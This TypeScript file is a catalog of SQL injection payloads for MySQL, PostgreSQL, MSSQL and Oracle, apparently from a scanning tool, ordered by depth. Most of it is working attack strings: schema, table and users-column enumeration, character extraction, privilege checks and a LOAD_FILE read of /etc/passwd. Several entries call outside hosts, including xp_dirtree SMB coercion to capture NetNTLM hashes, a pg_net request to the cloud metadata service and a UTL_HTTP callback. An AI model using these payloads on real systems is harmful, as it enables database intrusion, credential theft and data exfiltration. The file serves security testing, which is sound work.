import { DbmsType, InjectionContext, InjectionType } from '../../../types/sqlScanner';

export interface SqlPayloadEntry {
  id: string;
  name: string;
  dbms: DbmsType;
  context: InjectionContext;
  technique: InjectionType;
  level: number; // L1 - L17
  payload: string;
  description: string;
  expectedBehavior: string;
  riskLevel: 'Safe' | 'Probe' | 'Informational' | 'Exploit';
}

/**
 * Master catalog of structured SQL injection vectors across G1-G17 depth ladder
 */
export const SQL_PAYLOAD_CATALOG: SqlPayloadEntry[] = [
  // --- LEVEL 1: SYNTAX BREAK / ERROR DISCOVERY ---
  {
    id: 'G1_QUOTE_BREAK_SINGLE',
    name: 'Single Quote Syntax Reflection',
    dbms: 'Generic SQL',
    context: 'single_quote_string',
    technique: 'Error-based',
    level: 1,
    payload: "'",
    description: 'Breaks string literal boundary to test for unescaped quote reflection and DBMS error disclosure.',
    expectedBehavior: 'Unclosed quotation mark or syntax error in response body.',
    riskLevel: 'Safe',
  },
  {
    id: 'G1_QUOTE_BREAK_DOUBLE',
    name: 'Double Quote Syntax Reflection',
    dbms: 'Generic SQL',
    context: 'double_quote_string',
    technique: 'Error-based',
    level: 1,
    payload: '"',
    description: 'Breaks double-quoted identifier or literal boundary.',
    expectedBehavior: 'Syntax error or SQL parse failure.',
    riskLevel: 'Safe',
  },
  {
    id: 'G1_BACKSLASH_ESCAPE',
    name: 'Backslash Escape Confusion',
    dbms: 'MySQL',
    context: 'single_quote_string',
    technique: 'Error-based',
    level: 1,
    payload: '\\',
    description: 'Escapes subsequent closing quote in MySQL/MariaDB engines.',
    expectedBehavior: 'Unfinished string literal syntax error.',
    riskLevel: 'Safe',
  },

  // --- LEVEL 2: BOOLEAN SPLIT ---
  {
    id: 'G2_BOOL_TRUE_NUMERIC',
    name: 'Numeric Tautology (1=1)',
    dbms: 'Generic SQL',
    context: 'numeric',
    technique: 'Boolean-based',
    level: 2,
    payload: ' OR 1=1',
    description: 'Forces WHERE clause evaluation to TRUE in unquoted numeric contexts.',
    expectedBehavior: 'Returns complete records identical to baseline or unconstrained dataset.',
    riskLevel: 'Safe',
  },
  {
    id: 'G2_BOOL_FALSE_NUMERIC',
    name: 'Numeric Contradiction (1=2)',
    dbms: 'Generic SQL',
    context: 'numeric',
    technique: 'Boolean-based',
    level: 2,
    payload: ' AND 1=2',
    description: 'Forces WHERE clause evaluation to FALSE in unquoted numeric contexts.',
    expectedBehavior: 'Returns empty result set or "no records found" message.',
    riskLevel: 'Safe',
  },
  {
    id: 'G2_BOOL_TRUE_STRING',
    name: "String Tautology (' OR '1'='1)",
    dbms: 'Generic SQL',
    context: 'single_quote_string',
    technique: 'Boolean-based',
    level: 2,
    payload: "' OR '1'='1",
    description: 'Balances single-quoted string boundary and forces boolean TRUE.',
    expectedBehavior: 'Returns full result set.',
    riskLevel: 'Safe',
  },
  {
    id: 'G2_BOOL_FALSE_STRING',
    name: "String Contradiction (' AND '1'='2)",
    dbms: 'Generic SQL',
    context: 'single_quote_string',
    technique: 'Boolean-based',
    level: 2,
    payload: "' AND '1'='2",
    description: 'Balances single-quoted string boundary and forces boolean FALSE.',
    expectedBehavior: 'Returns zero records or differential error view.',
    riskLevel: 'Safe',
  },

  // --- LEVEL 3: TIME-BASED SPRT INFERENCE ---
  {
    id: 'G3_TIME_PG_SLEEP',
    name: 'PostgreSQL pg_sleep(5)',
    dbms: 'PostgreSQL',
    context: 'single_quote_string',
    technique: 'Time-based',
    level: 3,
    payload: "'||(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)||'",
    description: 'Conditionally executes PostgreSQL server sleep function for Wald SPRT inference.',
    expectedBehavior: 'Response latency increases by exactly 5000ms on TRUE condition.',
    riskLevel: 'Probe',
  },
  {
    id: 'G3_TIME_MYSQL_SLEEP',
    name: 'MySQL SLEEP(5)',
    dbms: 'MySQL',
    context: 'single_quote_string',
    technique: 'Time-based',
    level: 3,
    payload: "' AND (SELECT 1 FROM (SELECT SLEEP(5))A) AND '1'='1",
    description: 'Conditionally executes MySQL SLEEP() function.',
    expectedBehavior: 'Response latency increases by 5000ms.',
    riskLevel: 'Probe',
  },
  {
    id: 'G3_TIME_MSSQL_WAITFOR',
    name: 'MSSQL WAITFOR DELAY',
    dbms: 'Microsoft SQL Server',
    context: 'numeric',
    technique: 'Time-based',
    level: 3,
    payload: "; WAITFOR DELAY '0:0:5'--",
    description: 'Executes stacked WAITFOR DELAY statement in Microsoft SQL Server.',
    expectedBehavior: 'Response delay of 5000ms.',
    riskLevel: 'Probe',
  },
  {
    id: 'G3_TIME_ORACLE_DBMS_LOCK',
    name: 'Oracle DBMS_LOCK.SLEEP / DBMS_SESSION.SLEEP',
    dbms: 'Oracle',
    context: 'single_quote_string',
    technique: 'Time-based',
    level: 3,
    payload: "' AND 1=dbms_pipe.receive_message(('a'),5) AND '1'='1",
    description: 'Executes unprivileged pipe receive_message delay on Oracle DB.',
    expectedBehavior: 'Response delay of 5000ms.',
    riskLevel: 'Probe',
  },

  // --- LEVEL 4: ERROR DISCLOSURE / CAST EXTRACTION ---
  {
    id: 'G4_ERROR_PG_CAST',
    name: 'PostgreSQL CAST / Bigint Error Extraction',
    dbms: 'PostgreSQL',
    context: 'single_quote_string',
    technique: 'Error-based',
    level: 4,
    payload: "' AND 1=CAST((SELECT version()) AS int)--",
    description: 'Triggers invalid integer syntax error disclosing PostgreSQL version banner.',
    expectedBehavior: 'Error message containing "invalid input syntax for integer: PostgreSQL ..."',
    riskLevel: 'Probe',
  },
  {
    id: 'G4_ERROR_MYSQL_EXTRACTVALUE',
    name: 'MySQL EXTRACTVALUE / UpdateXML',
    dbms: 'MySQL',
    context: 'single_quote_string',
    technique: 'Error-based',
    level: 4,
    payload: "' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))-- -",
    description: 'Triggers XPath syntax error disclosing MySQL version.',
    expectedBehavior: 'XPATH syntax error: ~8.0.32~',
    riskLevel: 'Probe',
  },
  {
    id: 'G4_ERROR_MSSQL_CONVERT',
    name: 'MSSQL CONVERT(int, @@version)',
    dbms: 'Microsoft SQL Server',
    context: 'single_quote_string',
    technique: 'Error-based',
    level: 4,
    payload: "' AND 1=CONVERT(int, @@version)--",
    description: 'Triggers conversion error disclosing full MSSQL version banner.',
    expectedBehavior: 'Conversion failed when converting nvarchar value to data type int.',
    riskLevel: 'Probe',
  },
  {
    id: 'G4_ERROR_ORACLE_CTXSYS',
    name: 'Oracle CTXSYS.DRITHSX.SN',
    dbms: 'Oracle',
    context: 'single_quote_string',
    technique: 'Error-based',
    level: 4,
    payload: "' AND 1=CTXSYS.DRITHSX.SN(1, (SELECT banner FROM v$version WHERE rownum=1))--",
    description: 'Triggers DRG-11701 error disclosing Oracle DB banner.',
    expectedBehavior: 'ORA-20000: Oracle Text error: DRG-11701',
    riskLevel: 'Probe',
  },

  // --- LEVEL 5: VERSION FINGERPRINTING (UNION / POLYGLOT) ---
  {
    id: 'G5_UNION_VERSION_POLYGLOT',
    name: 'Single-Probe Concatenation Dialect Fingerprint',
    dbms: 'Generic SQL',
    context: 'single_quote_string',
    technique: 'UNION-based',
    level: 5,
    payload: "1' + (SELECT 1 WHERE 1=1) + '",
    description: 'Single-probe differential algebraic concat resolver.',
    expectedBehavior: 'MSSQL parses (+), Oracle/Postgres/SQLite fails (+), MySQL treats as space.',
    riskLevel: 'Probe',
  },

  // --- LEVEL 6: COLLATION EXPANSION & TRUNCATION COLLISIONS ---
  {
    id: 'G6_COLLATION_EXPANSION_SS',
    name: 'Unicode German Sharp-S Collation Expansion',
    dbms: 'MySQL',
    context: 'single_quote_string',
    technique: 'Boolean-based',
    level: 6,
    payload: "' OR 'ß'='ss'-- -",
    description: 'Bypasses blacklists by testing Unicode collation ligature expansion where ß matches ss.',
    expectedBehavior: 'Evaluates TRUE under utf8_general_ci or latin1_german collation.',
    riskLevel: 'Probe',
  },
  {
    id: 'G6_TRUNCATION_COLLISION_PADDING',
    name: 'SQL Whitespace Column Truncation Probe',
    dbms: 'MySQL',
    context: 'single_quote_string',
    technique: 'Boolean-based',
    level: 6,
    payload: "admin                           x",
    description: 'Audits non-strict SQL mode column length truncation collisions on user registration.',
    expectedBehavior: 'Truncates at fixed VARCHAR boundary colliding with administrative accounts.',
    riskLevel: 'Probe',
  },

  // --- LEVEL 7: STACKED MULTI-QUERY STATEMENTS ---
  {
    id: 'G7_STACKED_PG_SLEEP',
    name: 'PostgreSQL Stacked Query Statement Batch',
    dbms: 'PostgreSQL',
    context: 'single_quote_string',
    technique: 'Stacked-query indicator',
    level: 7,
    payload: "'; SELECT pg_sleep(3);--",
    description: 'Executes chained multi-statement batch separated by semicolon in PostgreSQL.',
    expectedBehavior: 'Server execution pauses for 3000ms indicating stacked execution support.',
    riskLevel: 'Probe',
  },
  {
    id: 'G7_STACKED_MSSQL_DELAY',
    name: 'MSSQL Stacked Query Statement Batch',
    dbms: 'Microsoft SQL Server',
    context: 'single_quote_string',
    technique: 'Stacked-query indicator',
    level: 7,
    payload: "'; WAITFOR DELAY '0:0:3'--",
    description: 'Executes stacked batch delay query in Microsoft SQL Server.',
    expectedBehavior: 'Response delay of 3000ms confirming stacked batch permissions.',
    riskLevel: 'Probe',
  },

  // --- LEVEL 8: WINDOWS SMB NETNTLMV2 COERCION ---
  {
    id: 'G8_SMB_MSSQL_XP_DIRTREE',
    name: 'MSSQL master..xp_dirtree Outbound SMB Coercion',
    dbms: 'Microsoft SQL Server',
    context: 'single_quote_string',
    technique: 'Out-of-Band (OAST)',
    level: 8,
    payload: "'; EXEC master..xp_dirtree '\\\\oast.sentinel.local\\audit'--",
    description: 'Forces MSSQL database engine to query external SMB share triggering NetNTLMv2 authentication.',
    expectedBehavior: 'Outbound TCP connection on port 445 / NetNTLM hash captured on listener.',
    riskLevel: 'Informational',
  },

  // --- LEVEL 9: DATABASE & SCHEMA ENUMERATION ---
  {
    id: 'G9_ENUM_DATABASES_MYSQL',
    name: 'MySQL Schema Enumeration via schema_name',
    dbms: 'MySQL',
    context: 'single_quote_string',
    technique: 'UNION-based',
    level: 9,
    payload: "' UNION SELECT 1, GROUP_CONCAT(schema_name SEPARATOR ',') FROM information_schema.schemata-- -",
    description: 'Extracts comma-delimited list of all database instances in MySQL/MariaDB server.',
    expectedBehavior: 'Returns database catalog schema names in response body.',
    riskLevel: 'Informational',
  },
  {
    id: 'G9_ENUM_DATABASES_PG',
    name: 'PostgreSQL Database Catalog Enumeration',
    dbms: 'PostgreSQL',
    context: 'single_quote_string',
    technique: 'UNION-based',
    level: 9,
    payload: "' UNION SELECT NULL, string_agg(datname, ',') FROM pg_database WHERE datistemplate=false--",
    description: 'Extracts non-template database names from PostgreSQL pg_database catalog.',
    expectedBehavior: 'Returns list of user databases.',
    riskLevel: 'Informational',
  },

  // --- LEVEL 10: SCHEMA & TABLE ENUMERATION ---
  {
    id: 'G10_TABLES_PG_INFORMATION_SCHEMA',
    name: 'PostgreSQL information_schema.tables',
    dbms: 'PostgreSQL',
    context: 'single_quote_string',
    technique: 'UNION-based',
    level: 10,
    payload: "' UNION SELECT NULL, string_agg(table_name, ',') FROM information_schema.tables WHERE table_schema='public'--",
    description: 'Extracts comma-separated list of all application tables.',
    expectedBehavior: 'Returns aggregated list of public table names in response body.',
    riskLevel: 'Informational',
  },
  {
    id: 'G10_TABLES_MYSQL_INFORMATION_SCHEMA',
    name: 'MySQL information_schema.tables',
    dbms: 'MySQL',
    context: 'single_quote_string',
    technique: 'UNION-based',
    level: 10,
    payload: "' UNION SELECT 1, GROUP_CONCAT(table_name SEPARATOR ',') FROM information_schema.tables WHERE table_schema=DATABASE()-- -",
    description: 'Extracts all active database table names.',
    expectedBehavior: 'Returns aggregated table names.',
    riskLevel: 'Informational',
  },

  // --- LEVEL 11: COLUMN METADATA ENUMERATION ---
  {
    id: 'G11_COLUMNS_PG_INFORMATION_SCHEMA',
    name: 'PostgreSQL Column Name Discovery',
    dbms: 'PostgreSQL',
    context: 'single_quote_string',
    technique: 'UNION-based',
    level: 11,
    payload: "' UNION SELECT NULL, string_agg(column_name, ',') FROM information_schema.columns WHERE table_name='users'--",
    description: 'Extracts comma-separated column names for target users table.',
    expectedBehavior: 'Returns column schema names in response body.',
    riskLevel: 'Informational',
  },
  {
    id: 'G11_COLUMNS_MYSQL_INFORMATION_SCHEMA',
    name: 'MySQL Column Name Discovery',
    dbms: 'MySQL',
    context: 'single_quote_string',
    technique: 'UNION-based',
    level: 11,
    payload: "' UNION SELECT 1, GROUP_CONCAT(column_name SEPARATOR ',') FROM information_schema.columns WHERE table_name='users'-- -",
    description: 'Extracts columns for users table in active MySQL schema.',
    expectedBehavior: 'Returns column names list.',
    riskLevel: 'Informational',
  },

  // --- LEVEL 12: BINARY BISECTION CHARACTER EXTRACTION ---
  {
    id: 'G12_BISECTION_ASCII_PG',
    name: 'PostgreSQL Binary Bisection Character Extraction',
    dbms: 'PostgreSQL',
    context: 'single_quote_string',
    technique: 'Boolean-based',
    level: 12,
    payload: "' AND ASCII(SUBSTRING((SELECT current_user),1,1))>64 AND '1'='1",
    description: 'Logarithmic O(log2 |Sigma|) bisection probe to resolve characters via binary search.',
    expectedBehavior: 'Bifurcates response state based on binary split threshold.',
    riskLevel: 'Safe',
  },
  {
    id: 'G12_BISECTION_ASCII_MYSQL',
    name: 'MySQL Binary Bisection Character Extraction',
    dbms: 'MySQL',
    context: 'single_quote_string',
    technique: 'Boolean-based',
    level: 12,
    payload: "' AND ORD(MID((SELECT user()),1,1))>64 AND '1'='1",
    description: 'Logarithmic bisection probe for MySQL character extraction.',
    expectedBehavior: 'Differential binary response.',
    riskLevel: 'Safe',
  },

  // --- LEVEL 13: USER PRIVILEGE & DBA ROLE DISCOVERY ---
  {
    id: 'G13_DBA_CHECK_ORACLE',
    name: 'Oracle DBA Role Verification Probe',
    dbms: 'Oracle',
    context: 'single_quote_string',
    technique: 'Boolean-based',
    level: 13,
    payload: "' AND (SELECT SYS_CONTEXT('USERENV', 'ISDBA') FROM DUAL)='TRUE' AND '1'='1",
    description: 'Checks if connected Oracle database user holds administrative DBA role.',
    expectedBehavior: 'TRUE response indicates elevated administrative privileges.',
    riskLevel: 'Probe',
  },
  {
    id: 'G13_IS_SRVROLEMEMBER_MSSQL',
    name: 'MSSQL Sysadmin Server Role Audit',
    dbms: 'Microsoft SQL Server',
    context: 'single_quote_string',
    technique: 'Boolean-based',
    level: 13,
    payload: "' AND 1=IS_SRVROLEMEMBER('sysadmin')--",
    description: 'Audits whether active MSSQL session possesses sysadmin server rights.',
    expectedBehavior: 'Evaluates TRUE if connected as sysadmin / sa.',
    riskLevel: 'Probe',
  },
  {
    id: 'G13_SUPER_PRIV_MYSQL',
    name: 'MySQL Super Privilege Audit',
    dbms: 'MySQL',
    context: 'single_quote_string',
    technique: 'Boolean-based',
    level: 13,
    payload: "' AND (SELECT Super_priv FROM mysql.user WHERE user=SUBSTRING_INDEX(USER(),'@',1))='Y' AND '1'='1",
    description: 'Checks if current MySQL account has SUPER privilege enabled.',
    expectedBehavior: 'Evaluates TRUE for administrative MySQL users.',
    riskLevel: 'Probe',
  },

  // --- LEVEL 14: SAFE FILESYSTEM READ CAPABILITY AUDIT ---
  {
    id: 'G14_FILE_READ_MYSQL_LOAD_FILE',
    name: 'MySQL LOAD_FILE Capability Audit',
    dbms: 'MySQL',
    context: 'single_quote_string',
    technique: 'UNION-based',
    level: 14,
    payload: "' UNION SELECT 1, LOAD_FILE('/etc/passwd')-- -",
    description: 'Safely audits if FILE privilege and secure_file_priv permit local file read operations.',
    expectedBehavior: 'Returns file content or NULL if unprivileged/restricted.',
    riskLevel: 'Probe',
  },
  {
    id: 'G14_FILE_READ_PG_READ_FILE',
    name: 'PostgreSQL pg_read_file Audit',
    dbms: 'PostgreSQL',
    context: 'single_quote_string',
    technique: 'UNION-based',
    level: 14,
    payload: "' UNION SELECT NULL, pg_read_file('postgresql.conf', 0, 100)--",
    description: 'Audits PostgreSQL pg_read_file capability for server configuration file inspection.',
    expectedBehavior: 'Returns configuration file text if superuser.',
    riskLevel: 'Probe',
  },

  // --- LEVEL 15: FILESYSTEM WRITE & LOG POISONING AUDIT ---
  {
    id: 'G15_FILE_WRITE_AUDIT_MYSQL_GENERAL_LOG',
    name: 'MySQL General Query Log Audit Vector',
    dbms: 'MySQL',
    context: 'single_quote_string',
    technique: 'Stacked-query indicator',
    level: 15,
    payload: "'; SHOW VARIABLES LIKE 'general_log';--",
    description: 'Audits whether runtime variables permit log redirection or file creation.',
    expectedBehavior: 'Returns configuration state of general query log.',
    riskLevel: 'Informational',
  },

  // --- LEVEL 16: OS COMMAND EXECUTION & CLR PROCEDURE AUDIT ---
  {
    id: 'G16_RCE_AUDIT_MSSQL_XP_CMDSHELL',
    name: 'MSSQL xp_cmdshell Configuration Audit',
    dbms: 'Microsoft SQL Server',
    context: 'single_quote_string',
    technique: 'Stacked-query indicator',
    level: 16,
    payload: "'; SELECT value_in_use FROM sys.configurations WHERE name='xp_cmdshell'--",
    description: 'Checks if xp_cmdshell procedure is enabled on Microsoft SQL Server.',
    expectedBehavior: 'Returns 1 if enabled, 0 if disabled.',
    riskLevel: 'Informational',
  },
  {
    id: 'G16_RCE_AUDIT_PG_COPY_PROGRAM',
    name: 'PostgreSQL COPY FROM PROGRAM Privilege Check',
    dbms: 'PostgreSQL',
    context: 'single_quote_string',
    technique: 'Boolean-based',
    level: 16,
    payload: "' AND (SELECT pg_has_role(current_user, 'pg_execute_server_program', 'MEMBER'))=true AND '1'='1",
    description: 'Audits if PostgreSQL current role is member of pg_execute_server_program.',
    expectedBehavior: 'Evaluates TRUE if user possesses command execution permissions.',
    riskLevel: 'Informational',
  },

  // --- LEVEL 17: CLOUD DBAAS SSRF & OUT-OF-BAND EXTENSIONS ---
  {
    id: 'G17_SSRF_PG_NET',
    name: 'PostgreSQL pg_net Egress HTTP SSRF',
    dbms: 'PostgreSQL',
    context: 'single_quote_string',
    technique: 'Out-of-Band (OAST)',
    level: 17,
    payload: "'; SELECT net.http_get('http://169.254.169.254/latest/meta-data/');--",
    description: 'Audits Supabase/RDS pg_net extension for cloud instance metadata exfiltration.',
    expectedBehavior: 'Outbound HTTP request to instance metadata service.',
    riskLevel: 'Exploit',
  },
  {
    id: 'G17_SSRF_ORACLE_UTL_HTTP',
    name: 'Oracle UTL_HTTP.REQUEST Out-of-Band Callback',
    dbms: 'Oracle',
    context: 'single_quote_string',
    technique: 'Out-of-Band (OAST)',
    level: 17,
    payload: "' AND 1=UTL_HTTP.REQUEST('http://oast.sentinel.dev/oracle_leak')--",
    description: 'Triggers outbound HTTP request from Oracle database server.',
    expectedBehavior: 'HTTP callback recorded on Sentinel OAST listener.',
    riskLevel: 'Exploit',
  },
];
